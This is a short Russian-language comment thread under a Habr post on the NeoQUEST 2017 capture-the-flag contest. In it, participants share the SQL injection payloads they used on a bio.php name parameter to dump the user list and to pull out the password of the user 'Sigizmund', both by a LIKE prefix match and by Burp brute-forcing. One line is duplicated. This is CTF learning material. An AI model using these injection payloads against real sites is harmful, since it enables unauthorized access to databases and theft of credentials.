Комментарии 5
Мое решение выглядело примерно так:
Sigizmund'=password like _utf8mb4'14eb6641da38addf61%'#
Если в выборке возвращается Sigizmund — true.
+3
Спасибо за приятные слова! Мы старались сделать NeoQUEST еще увлекательнее. Ждём на «очную ставку» ;)
0
Получить всех пользователей удалось так:
/bio/bio.php?name=Ohad%27%2bname+--+
Вытащить пароль сигизмунда удалось перебором с помощью бурпа так:
/bio/bio.php?name=Ohad%27%2bname+--+
Вытащить пароль сигизмунда удалось перебором с помощью бурпа так:
/bio/bio.php?name=Sigizmund'+and+password>0x313445423636343144413338414444463631333432344635434430353335374345323631433330344§0§+or+"s"+'
+1
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
[NeoQuest2017] «В поиске землян» и не только…